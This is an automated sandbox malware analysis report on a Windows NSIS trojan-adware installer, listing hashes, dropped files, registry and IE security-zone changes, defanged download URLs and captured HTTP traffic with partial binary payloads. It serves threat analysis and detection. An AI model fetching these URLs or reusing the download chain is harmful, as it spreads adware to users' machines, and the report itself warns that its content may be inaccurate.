Trojan.NSIS.StartPage_fc4d25972a
not-a-virus:HEUR:AdWare.Win32.AdLoad.heur (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: fc4d25972acadcae51348feb7c711c5f
SHA1: 42acf0d5617280b8618c911292f0ae388cb711e8
SHA256: 858db4e31fdfb3536ec413f43d677e740acdb3a1127f622da604614a09f8a174
SSDeep: 98304:z4J4DQILVFYWL7mNMG/RYglabbK9lpSyElvALLeK4krycBGFOxYq8FNw/:z4JLUdL7mN/ZYglabb l5EJAneLKuJNk
Size: 6217725 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
cpSetup.exe:1624
gKvx9Vb2eO.exe:1724
%original file name%.exe:668
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process cpSetup.exe:1624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0004582e.a (1731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0004532d.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0JP3NNO3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EYJ5XCEM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TWQ30O7D\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y2SW6UK6\desktop.ini (67 bytes)
The process gKvx9Vb2eO.exe:1724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\cpSetup.exe (12184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\1157049897 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\nsArray.dll (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp (0 bytes)
The process %original file name%.exe:668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\S (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\gKvx9Vb2eO.exe (9068 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1.tmp (0 bytes)
Registry activity
The process cpSetup.exe:1624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A B4 70 9C 7F E6 CA F5 89 60 28 0C FE AE 89 7F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1454521114"
"Name" = "cpSetup.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process gKvx9Vb2eO.exe:1724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 C2 B9 66 A4 D2 15 A5 BF D7 10 85 43 E3 6F 25"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 D5 FB AE 96 CD 3F CB 62 F2 F9 0F A3 B3 F0 17"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| f60e597323c2fe854ba7879beb425cc9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0004532d.a |
| c3ce6975ba30faf1daec06c9d1f71d92 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0004582e.a |
| 7caaf58a526da33c24cbe122e7839693 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj4.tmp\NSISdl.dll |
| 4b5c06a4c37a7f1efc4dcb1d26363ba7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj4.tmp\cpSetup.exe |
| 89d40ecddf3ce6f3b0e6a84f40936912 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj4.tmp\nsArray.dll |
| a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\NSISdl.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\System.dll |
| c0c21cf3f40d2a5703f9b790d38b665a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\gKvx9Vb2eO.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 233472 | 47384 | 47616 | 3.47357 | b19867e5d06bc11c2a9eeafb589aaf2f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4251180&pid=1505&n=WW91ciB1bmluc3RhbGxlciBwcm8gNy41IDIwMTQgMDMuMjAxNCDQoNChIHJlcGFjayBbMTMwNjE1QkFQXQ==&b_typ=pe | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014 03.2014 РС repack [130615BAP] | |
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1505&tid=4251180&b_typ=pe&n=WW91ciB1bmluc3RhbGxlciBwcm8gNy41IDIwMTQg&reb=1&ic= | |
| hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Your%20uninstaller%20pro%207.5%202014%20&s1=1505&s2=4251180&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://up.skdfhi73.xyz/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4251180&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.skdfhi73.xyz/offer.php?affId={aff_id}&trackingId=6244354&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= | |
| hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4251180&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.skdfhi73.xyz/offer.php?affId={aff_id}&trackingId=6244354&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= | |
| hxxp://up.skdfhi73.xyz/offer.php?affId=1006&trackingId=6244354&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&cc=UA&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= | |
| hxxp://up.skdfhi73.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA | |
| hxxp://go.slf37hf.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA | |
| hxxp://up.skdfhi73.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA&id[]=911&id[]=912&id[]=913&id[]=914&id[]=915&id[]=633&id[]=634&id[]=637&id[]=855&id[]=856&id[]=29&id[]=631&id[]=632&id[]=885&id[]=886&id[]=887&id[]=888&id[]=889&id[]=890&id[]=891&id[]=892&id[]=893&id[]=894&id[]=895&id[]=896&id[]=897&id[]=898&id[]=899&id[]=900&id[]=901&id[]=902&id[]=903&id[]=904&id[]=905&id[]=906&id[]=907&id[]=908&id[]=909&id[]=910&id[]=916&id[]=917&id[]=918&id[]=921&id[]=638&id[]=639&id[]=640&id[]=642&id[]=643&id[]=644&id[]=646&id[]=647&id[]=648&id[]=650&id[]=651&id[]=652&id[]=654&id[]=852&id[]=854 | |
| hxxp://dl.ddownload6.club/stub_maker.php?program=sevenzip&tid=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014 03.2014 РС repack [130615BAP] | |
| hxxp://get.fc-gosh.biz/launch_reb.php?p=sevenzip&tid=4251180&pid=1505&n=WW91ciB1bmluc3RhbGxlciBwcm8gNy41IDIwMTQgMDMuMjAxNCDQoNChIHJlcGFjayBbMTMwNjE1QkFQXQ==&b_typ=pe | |
| hxxp://up.skdfhi73.xyzhxxp://up.skdfhi73.xyz/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4251180&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.skdfhi73.xyz/offer.php?affId={aff_id}&trackingId=6244354&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= | |
| hxxp://up.skdfhi73.xyzhxxp://up.skdfhi73.xyz/offer.php?affId=1006&trackingId=6244354&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&cc=UA&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= | |
| hxxp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4251180&b_typ=pe&n=WW91ciB1bmluc3RhbGxlciBwcm8gNy41IDIwMTQg&reb=1&ic= | |
| hxxp://get.slfdio83rh.xyz/?affId=1006&appTitle=Your%20uninstaller%20pro%207.5%202014%20&s1=1505&s2=4251180&setupName=cpSetup&appVersion=2.92&instId=11 | |
| hxxp://up.skdfhi73.xyzhxxp://up.skdfhi73.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA&id[]=911&id[]=912&id[]=913&id[]=914&id[]=915&id[]=633&id[]=634&id[]=637&id[]=855&id[]=856&id[]=29&id[]=631&id[]=632&id[]=885&id[]=886&id[]=887&id[]=888&id[]=889&id[]=890&id[]=891&id[]=892&id[]=893&id[]=894&id[]=895&id[]=896&id[]=897&id[]=898&id[]=899&id[]=900&id[]=901&id[]=902&id[]=903&id[]=904&id[]=905&id[]=906&id[]=907&id[]=908&id[]=909&id[]=910&id[]=916&id[]=917&id[]=918&id[]=921&id[]=638&id[]=639&id[]=640&id[]=642&id[]=643&id[]=644&id[]=646&id[]=647&id[]=648&id[]=650&id[]=651&id[]=652&id[]=654&id[]=852&id[]=854 | |
| hxxp://go.slf37hf.xyzhxxp://go.slf37hf.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA | |
| hxxp://up.skdfhi73.xyzhxxp://up.skdfhi73.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA | |
| hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4251180&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.skdfhi73.xyz/offer.php?affId={aff_id}&trackingId=6244354&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible Call with No Offset TCP Shellcode
Traffic
POST hXXp://go.slf37hf.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA HTTP/1.1
Host: go.slf37hf.xyz
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
id[]=911&id[]=912&id[]=913&id[]=914&id[]=915&id[]=633&id[]=634&id[]=637&id[]=855&id[]=856&id[]=29&id[]=631&id[]=632&id[]=885&id[]=886&id[]=887&id[]=888&id[]=889&id[]=890&id[]=891&id[]=892&id[]=893&id[]=894&id[]=895&id[]=896&id[]=897&id[]=898&id[]=899&id[]=900&id[]=901&id[]=902&id[]=903&id[]=904&id[]=905&id[]=906&id[]=907&id[]=908&id[]=909&id[]=910&id[]=916&id[]=917&id[]=918&id[]=921&id[]=638&id[]=639&id[]=640&id[]=642&id[]=643&id[]=644&id[]=646&id[]=647&id[]=648&id[]=650&id[]=651&id[]=652&id[]=654&id[]=852&id[]=854
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sun, 21 Feb 2016 03:48:17 GMT
Connection: close
Content-Length: 344<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org
/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length
Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="t
ext/html; charset=us-ascii"></HEAD>..<BODY><h2>Le
ngth Required</h2>..<hr><p>HTTP Error 411. The reque
st must be chunked or have a content length.</p>..</BODY>&
lt;/HTML>....
GET /launch_reb.php?p=sevenzip&tid=4251180&pid=1505&n=WW91ciB1bmluc3RhbGxlciBwcm8gNy41IDIwMTQgMDMuMjAxNCDQoNChIHJlcGFjayBbMTMwNjE1QkFQXQ==&b_typ=pe HTTP/1.0
Host: get.fc-gosh.biz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 183
Connection: close
Date: Sun, 21 Feb 2016 03:48:13 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 bcde18fe57c01210eccee8a7d0a23a85.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rF2XgzAbvQGuUg6-3cncEJ9-O9EPjHiBhoDpMmd1_abtF4kl4LHD_g==s=first..u=hXXp://dl.ddownload6.club/stub_maker.php?program=sevenzip&t
id=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014
03.2014 РС repack [130615BAP]..
GET hXXp://up.skdfhi73.xyz/offer.php?affId=1006&trackingId=6244354&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&cc=UA&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= HTTP/1.1
Host: up.skdfhi73.xyz
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 76328
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 21 Feb 2016 03:48:16 GMT
X-Cache: Miss from cloudfront
Via: 1.1 edd2a5d0833e10b384dd66f5bbc84266.cloudfront.net (CloudFront)
X-Amz-Cf-Id: yuo9gLklDKVFWFfp-vCPoH5s0aRLzheAIg0k1sF8KSpZCyZBwvb6OQ==.&fF..(...e.A..:...\F.{9M/...|H'[..........R.......}.u.eu6.$3....wrB.y
..e......z...>.T..q....,...}.s.....P.&..Qy....= .y!\..71M..Rt......
(...|P".Y..B.F..Rt...a...........%...r....Y..`............x..".9.SK.R.
..'.M0.......0.ot..,1......J......# .t..J.lf{...8k.6&...(.Sn.:..J.%gp.
..J|.H.a.{....n...=........hw.=..%.{.... .F0.c.<B..j...2M....;..j.]
.P.....9..7..8..}.5.h.g7......qC... 3..\....H|xwj.. \..'#R._.^..@[.Q..
....#...t...7.AU..6.3N....UUv..F.d..........*..Np...G<.....a...H...
..&...y..7.,9..g..0...7...!.z-.z4..|.9\..&..8...a....v....3......o...m
D.E"...qgQ03`v...ZL. *3t..>.c.0....c..;....q,.^/Q....uo.Y.>k.`..
..]._.*../..Bk./,-.Z(...P.....\n ....W.i4.........q9..9.dO.Q.cKSB...Q
bN.M....r..w.f-J..j..~.....Z.9..YF=.).A)D.....}h..DT.=(!.....26..=1o.x
.$....yt......."?.z...z...RR.~.u..u..Y.20.?4.......k....jY..iy._.3.,..
.......J..u.R.j.h.Q..=[M.]0.....V.C..j9n^.u7h.k.Km..!..>;T....n.aV3
.y-..~..~...p.w.K....(..x.vwb@..>...Ucs.w....o.:...w...{.L..2p.....
.1...k@$..*`|.2P...sE.......#..'8.3.......Z..#.l.y.P...jN#6... ..n....
\...~.. G.4w....y...0^e........Uk.:U8........[j.......xUv.!.T.T.../...
a...!........Ah.v\V ...*.N.7.f.....hY/Mw[..I.D.....ay!wj.;3..yC..0..h.
......X..G.)8..%q....\7R.q".i}t.............._d.,k....$....\.....2#f..
<.....!a.x. ....F......2!..)/..YF.....6H.....[..iQ`<...2.*.`...z
.^(.O... I.q..*U.....W..1.....A.Cv%;.i.!.O..]H..O.~.H.y......<|../.
.I.A.E'r..T.E... ............$Y...2.....u....z.Z.0G...}$.2._....../t..
Y..(2..#>p.-U...0at...`.......g.men._...J-._.O........M........<<< skipped >>>
POST hXXp://up.skdfhi73.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA HTTP/1.1
Host: up.skdfhi73.xyz
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
id[]=911&id[]=912&id[]=913&id[]=914&id[]=915&id[]=633&id[]=634&id[]=637&id[]=855&id[]=856&id[]=29&id[]=631&id[]=632&id[]=885&id[]=886&id[]=887&id[]=888&id[]=889&id[]=890&id[]=891&id[]=892&id[]=893&id[]=894&id[]=895&id[]=896&id[]=897&id[]=898&id[]=899&id[]=900&id[]=901&id[]=902&id[]=903&id[]=904&id[]=905&id[]=906&id[]=907&id[]=908&id[]=909&id[]=910&id[]=916&id[]=917&id[]=918&id[]=921&id[]=638&id[]=639&id[]=640&id[]=642&id[]=643&id[]=644&id[]=646&id[]=647&id[]=648&id[]=650&id[]=651&id[]=652&id[]=654&id[]=852&id[]=854
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Sun, 21 Feb 2016 03:48:20 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 8bed981585e2338012e4dd37a06b0cdb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vplSEazPyvZB_nzvzC-xltYrR1JVKk4lgLI3n8o8JR1eVlAi9qrlTg==<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: vplSEazPyvZB_n
zvzC-xltYrR1JVKk4lgLI3n8o8JR1eVlAi9qrlTg==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..
GET /?affId=1006&appTitle=Your%20uninstaller%20pro%207.5%202014%20&s1=1505&s2=4251180&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.slfdio83rh.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 144896
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Sun, 21 Feb 2016 03:48:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 cbb439ecf760e902d3e0e61532befa44.cloudfront.net (CloudFront)
X-Amz-Cf-Id: sKAgwRQ5cHlrmzA7RpDQbc3WWS87B9GTcoLz1lKyDHtQjP2KKnE9EA==MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........d..........
.....T8......T.......T.......}t..............W.......W<.......p....
..W9.....Rich............PE..L....;.V.................T..........3....
....p....@.......................................@....................
.............<...(.... ..8R......................|.................
......................@............p...............................tex
t....S.......T.................. ..`.rdata...c...p...d...X............
..@[email protected]...@[email protected]... ...T......
............@[email protected]..|[email protected]..............
......................................................................
......................................................................
......................................................................
......................................................................
..................................................h.cA......Y.....h.cA
......Y.....h.cA......Y......D$..V.....~A.t.V..........^.....D$..T$...
.H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2....................
.D$.;H.u...;D$.u......2............A............QV.t$..D$...........t$
.........A..E..F......F.........:.u.3.QR...K.....^Y.....W.y...A..u. ._
QR... .....^Y..........A............Q.D$...$....V.t$....u&j..F........
F.....h..A...........^Y...PV.=.....^Y............A............QV.t$..D
$...........t$.........A..E..F......F.........:.u.3.QR...k.....^Y.<<< skipped >>>
GET hXXp://up.skdfhi73.xyz/installer.php?affId=1006&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&trackingId=6244354&cc=UA&id[]=911&id[]=912&id[]=913&id[]=914&id[]=915&id[]=633&id[]=634&id[]=637&id[]=855&id[]=856&id[]=29&id[]=631&id[]=632&id[]=885&id[]=886&id[]=887&id[]=888&id[]=889&id[]=890&id[]=891&id[]=892&id[]=893&id[]=894&id[]=895&id[]=896&id[]=897&id[]=898&id[]=899&id[]=900&id[]=901&id[]=902&id[]=903&id[]=904&id[]=905&id[]=906&id[]=907&id[]=908&id[]=909&id[]=910&id[]=916&id[]=917&id[]=918&id[]=921&id[]=638&id[]=639&id[]=640&id[]=642&id[]=643&id[]=644&id[]=646&id[]=647&id[]=648&id[]=650&id[]=651&id[]=652&id[]=654&id[]=852&id[]=854 HTTP/1.1
Host: up.skdfhi73.xyz
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 450600
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 21 Feb 2016 03:48:17 GMT
X-Cache: Miss from cloudfront
Via: 1.1 c77b51ad135b3319a54e2e40de778962.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GYU5fkLbLnOKP40gyubCwxGtmJK3OJSOK4MSLeSIVOuQLaFkWJGgyw==.K..a...=...f[.N]t..y......X....d.m*,.j...u.t....`..x!v....)..'.rx....
.Lz....B.g.F....>S.L.....=..,X..Q1...f..ny...O.IZ.Q...G.....,M4....
..1'....e..@!#6~..........M^0(...k5A.......l...)r..g}......zI.7...^.:.
..p.....B.m.]wj..x|9P.... .P.jBS.T.>.uS...}@.".M.|=.....Q..0..Ut...
@mC)...g..L&[M.Z.k.2`..X..;...!....T.....urS.h......d..........?^.....
.........#..?d.KMw!.C......&T........i.W.:"h...^..{....O0r...."[email protected].
;.Z7..d..{5.......xt..c1.'.U4..h..G..A.G.@..@Z...:f...:..=..*0.).F...b
}P.Y..z....&TUQ...>......T..L..S\d..ZQh..4WNY..v=p...........q&.^Y.
5Lz.k.3.....or......F.4.t..u.RV..A..:q..........gH.B...._..........b..
.D| ..m...7..i. ".s8.n.....[.a<..j...zjM.%.....3..KK.#......|.w5.H.
.w.x.......(.....%.8xv..9.%%.W...%.......z....P%.].Zx%...6.H.......&.,
.....{......8.X..AvX.......T....oS...v<s~.......X.u/.p...@...:..We.
d..V..!..e....Y..}B........o.W.f...O..A.........W&....W..#...A....L./.
..yH ...vd.:...I4...........>..[.......UkM..bg.....Pw.....2k..e...z
P..eag....x...Za...$Ri...C`.T>......i..PC.#..Ap...^.K...1...IK$#..-
*....ba...(....I!...wa.$...;u...,...a.....c.N...).,...uy..4-...07..G..
.6.....YK.q.p`...0.Rr8iZ.......~.{..:,...AH.W.....r..DF...5.m..(.0R{..
w....O....~K..... P.N.F.........n....78B.w.x.....\.%.It....y,....f..#.
2....xN...T...|...3>...t(.w-),O(d.:J....R.G.S................i!y..
l!.4@@.}C....5.:..^}S..T.rg}.......%.....-]{.....*.d....P0CX;.s.....1/
...c....z.p.x.mcz..z%Rf7.M......E...O..~q..`.j}._.J>....{.S.....f.k
....j(.........|og2..[y.e.:.J...#$..0..I.K,|...&..pn..U...b.9..'..<<< skipped >>>
GET /stub_maker.php?program=sevenzip&tid=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014 03.2014 РС repack [130615BAP] HTTP/1.0
Host: dl.ddownload6.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 66840
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="56c9337dc7bfe.exe"
X-Powered-By: ASP.NET
